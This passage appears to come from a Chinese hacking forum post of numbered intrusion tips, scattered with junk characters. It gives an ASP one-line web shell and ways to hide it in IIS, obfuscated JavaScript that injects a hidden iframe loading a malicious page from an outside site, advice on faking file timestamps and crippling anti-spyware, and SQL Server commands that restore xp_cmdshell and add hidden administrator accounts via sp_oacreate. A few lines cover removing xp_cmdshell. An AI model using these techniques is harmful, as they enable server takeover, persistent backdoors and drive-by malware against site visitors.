52、at "12:17" /interactive cmd' V/ }6 C( v# F$ m4 |
执行后可以用AT命令查看新加的任务
3 b) F( Q  b; ?4 J用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。7 c" O% G7 a, o6 A8 u0 r
- l8 ?! T# O9 l  S8 u
53、隐藏ASP后门的两种方法, q; Q. S, k1 R% |9 x
1、建立非标准目录:mkdir images..\4 U* F* Z! p# K+ s! t
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp1 {3 K+ L3 C  V* {1 K
通过web访问ASP木马:http://ip/images../news.asp?action=login/ K7 c( o  u( X  @- e+ T. Y) M: C
如何删除非标准目录:rmdir images..\ /s+ N0 T) `. F: h% l9 ^( K
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
6 i- g1 b# s% i/ p. _2 a3 I* }mkdir programme.asp
3 G1 C, [( ]8 E7 x新建1.txt文件内容:<!--#include file=”12.jpg”-->
0 n0 \& K" d/ I新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
5 i3 x3 u; J% S3 e7 Z: dattrib +H +S programme.asp9 s9 z0 _! D9 Y# h9 m1 o& P) u0 x
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
% y% X% |. d) o. R5 S, A: h; ?
7 V9 L9 T0 t1 ]$ s6 }54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
4 n: ?' D; k  o. t然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。0 W! m2 b, _% d6 j9 P, P+ b

+ J3 w* Y' Q/ H( m% K3 T55、JS隐蔽挂马- D: }9 M* m5 h3 ]. P
1.6 R/ ?/ `8 x( a0 Y; N' L# ^
var tr4c3="<iframe src=ht";# m" L: s. I* v: A9 }( v- K8 @; M1 S' c
tr4c3 = tr4c3+"tp:/";
5 @( T3 e' a& h% k$ R, h4 r9 e- Mtr4c3 = tr4c3+"/ww";
3 v3 E4 _0 f& q# E) S% {1 ^# R0 d/ Utr4c3 = tr4c3+"w.tr4";, o! d$ K" `2 Z. U) C
tr4c3 = tr4c3+"c3.com/inc/m";
: l& t; ^* }+ Ptr4c3 = tr4c3+"m.htm style="display:none"></i";
1 y7 A: S/ z% Q& dtr4c3 =tr4c3+"frame>'";  u+ m0 G; |3 D3 h
document.write(tr4c3);
7 }- I) Z- k* G0 G3 y避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
+ ?8 q3 p, c2 G1 O$ V  b& }! \# M6 q1 {& C. b2 q5 d
2.8 H" g! p2 Y6 q- Z
转换进制,然后用EVAL执行。如& c( A7 ?" y/ F' ~
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
# C1 I; D0 [7 n$ e8 s  ]& O不过这个有点显眼。, y' y% W8 [% U) `7 t
3.$ X7 v8 g- g, Z- \$ p( _
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');' g/ B3 F! K. j. \. Y$ W- L
最后一点,别忘了把文件的时间也修改下。# y/ w  l: F7 @( q2 _
; }& o& s  Y* v7 s
56.3389终端入侵常用DOS命令
6 C2 J& O' g  `. }  I6 p2 P* ytaskkill taskkill /PID 1248 /t& N8 p! V4 k3 t
; u( O' o  M  Z- o# b' }
tasklist 查进程
; f9 B% i6 F3 h+ l2 g7 z7 X) `
; h  O: i0 D8 Gcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
' }/ Z' Y( k0 o8 Piisreset /reboot) e) A& H7 p* T9 c, V* ]" k0 v
tsshutdn /reboot /delay:1    重起服务器
! }, W7 R; h$ S( r3 r# O: ~1 J- q7 z; _* c: o
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
$ U. z3 p9 Y# M9 @# h8 T+ E' p, J+ p5 k
; L% k7 h4 @2 ]. v% o* Tquery user 查看当前终端用户在线情况
) S$ }. V& d0 w6 L) w6 `- f: D* K: u; W8 X+ T6 T9 l+ ?: L
要显示有关所有会话使用的进程的信息,请键入:query process *
# C9 K, A3 H+ W
9 W8 ^: @* A9 V5 r要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:25 y: `) x! \7 s0 Q* C# T

  l+ v) q; s) \! Y2 X要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
$ T  `- @, c0 @. z3 W; v, I) X0 K5 T1 R. l
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02' Q* G7 }7 K4 K# i  M: L
0 F; R! b$ J) D7 R( H. j
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启/ A# z" B- S7 A! `  f. c% d* y
  k- q$ r' B1 h+ m. t, ?
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
# h% A7 _8 I* L- n! C3 f4 p9 I* ?. R/ l- b6 l" D5 ~
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。( K- Q) u/ ^/ ]# y0 W2 X

+ d; c, a0 w. ~- d命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机$ X8 w+ j/ o: u2 Y3 @% p/ x) K
! A6 }, V8 D/ c5 ^
56、在地址栏或按Ctrl+O,输入:
1 q1 r+ x9 y& s& Wjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
) d# [* W" o- _$ B9 K6 n- l0 y& P$ ~: {  W! n6 n4 y
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
( t: z) X- @+ e6 T5 j& a1 Q* ^, G6 n7 v" Q9 I! p
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,+ h9 D9 U9 A5 ^1 u' q, L) n; |
用net localgroup administrators是可以看到管理组下,加了$的用户的。
2 u( K, c: P. v  k/ R) E7 E
( R( _& ~  \) |/ z  R  H/ I% r58、 sa弱口令相关命令
$ O3 D+ a, I& Q& b# S0 f: J3 ~
9 T9 A- c2 f9 W& \% x一.更改sa口令方法:& t# J+ s0 c# l# \
用sql综合利用工具连接后,执行命令:
' x8 Z. l; D5 `' f% Rexec sp_password NULL,'20001001','sa'
  }: l( d$ O. @5 K% Q" c9 E- X(提示:慎用!): \4 ]; ]: A6 o0 }  L

. V' \0 d6 [1 T" l二.简单修补sa弱口令.
! e% N" E$ C( ~
7 g1 f; B; i5 \# W9 e方法1:查询分离器连接后执行:
" S2 R: W2 K) o' r( Q1 n* Zif exists (select * from# n6 [: H  B) ]) ?0 u* n
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
# O4 ?' u/ r# Q2 oOBJECTPROPERTY(id, N'IsExtendedProc') = 1)/ T# V1 I5 M( {' |/ l: ?" D, \' E

9 ^# @0 l! }- J, T% Kexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
' T1 B  }. ~# F1 j. T1 |% F) Q8 W8 _1 J- t6 x2 [( X# u
GO: e8 K- g' t: W9 G6 L

# a, [' N/ B# g& ~2 s然后按F5键命令执行完毕! [' K" ?/ d/ o- L

) x! s, S$ G: V# f2 m7 G# u) `方法2:查询分离器连接后
3 V+ {, U! n* B2 ~* l9 C第一步执行:use master% m- W& g2 Q/ W3 T0 o& }2 j
第二步执行:sp_dropextendedproc 'xp_cmdshell'; T3 s9 H9 ]6 A. `! }
然后按F5键命令执行完毕
  W8 g8 G& r+ o* t( G$ C* V' ^% R0 T
9 V) _, s; e+ r: {3 i  F' w# z" N. j: \
三.常见情况恢复执行xp_cmdshell.' C; P2 P8 O8 b# w# u5 v/ u
/ L" l- v' B, C( k$ Q9 f! N

$ g+ u8 x! Q6 s9 Z4 X( p6 Z1 未能找到存储过程'master..xpcmdshell'.  Z4 R* H4 g8 \% }2 C
   恢复方法:查询分离器连接后,% k, f4 a& @8 C. U+ H
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int! D) H' U, m3 O# ]. }
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
0 m1 H2 l/ n: R2 I8 k然后按F5键命令执行完毕
+ g" K" ^$ r9 {. ^9 x( P
& ?' H$ T. u* w  {. _/ a4 Q2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)3 S* [; W. F5 c& d
恢复方法:查询分离器连接后,
1 e# |& j) C/ \第一步执行:sp_dropextendedproc "xp_cmdshell"/ c& h; T1 V# R- R; U( U. R+ c9 r
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'0 s* @# M& z9 P- T
然后按F5键命令执行完毕
+ @. t5 d4 h9 d6 w
, }+ z# L. N0 |: Q0 v! H7 W) |3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)" |: P0 m8 ~1 L7 t
恢复方法:查询分离器连接后,3 f" O6 J7 L$ Q. r) {( E
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
. ]6 c. k1 |3 z4 W5 M第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'             ?& }* r+ E( Q( o. S9 Q8 d
然后按F5键命令执行完毕
) n2 K- H! Z( k$ l# N0 B1 }! i! P! c3 S; [+ g
四.终极方法.
; O' X# q1 P* z" h如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
3 d8 M" W8 v; _5 E查询分离器连接后,7 {. p4 X1 R$ u0 E3 S, A
2000servser系统:& }' R7 I& ~. b: A2 i8 I
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
2 z  I- c9 T- |5 b% d* O% X9 P. ~, w, \0 t
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add', T5 t0 t4 Y* R2 w
" I5 C  x  I" G( v7 g3 [8 M5 A
xp或2003server系统:
7 G3 P3 W9 c- \! ~/ {
2 b& W4 a1 V: S* ]declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
) o6 d  ?7 }- ^4 c7 R3 q' v3 ?4 V+ {; b6 P. V1 D8 @
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'8 Z5 s- U& Z/ F5 g3 y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表